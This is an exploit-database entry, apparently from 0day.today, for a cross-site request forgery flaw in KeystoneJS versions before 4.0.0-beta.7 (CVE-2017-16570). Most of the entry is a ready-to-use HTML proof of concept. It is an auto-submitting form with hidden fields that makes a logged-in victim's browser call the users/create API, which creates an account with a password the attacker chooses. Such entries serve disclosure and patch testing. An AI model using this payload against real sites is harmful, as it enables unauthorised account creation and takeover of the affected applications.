KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery Vulnerability

2018-01-28T00:00:00
ID 1337DAY-ID-29660
Type zdt
Reporter Saurabh Banawar
Modified 2018-01-28T00:00:00

Description

Exploit for jsp platform in category web applications

                                        
                                            # Exploit Title: Application wide CSRF Bypass
# Date: Sep, 2017
# Exploit Author: Saurabh Banawar
# Vendor Homepage: http://keystonejs.com/
# Software Link: https://github.com/keystonejs/keystone
# Version: 4.0.0
# Tested on: Windows 8.1
# CVE : 2017-16570
 
 
Link: https://vuldb.com/?id.109170
 
 
Exploit:
 
<html>
 <body>
 <form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
enctype="multipart/form-data">
 <input type="hidden" name="name.first" value="Saurabh" />
 <input type="hidden" name="name.last" value="Banawar" />
 <input type="hidden" name="email"
value="saurabh.banawar@securelayer7.net" />
 <input type="hidden" name="password" value="test" />
 <input type="hidden" name="password_confirm" value="test" />
 <input type="submit" value="Submit request" />
 </form>
 </body>
</html>

#  0day.today [2018-03-02]  #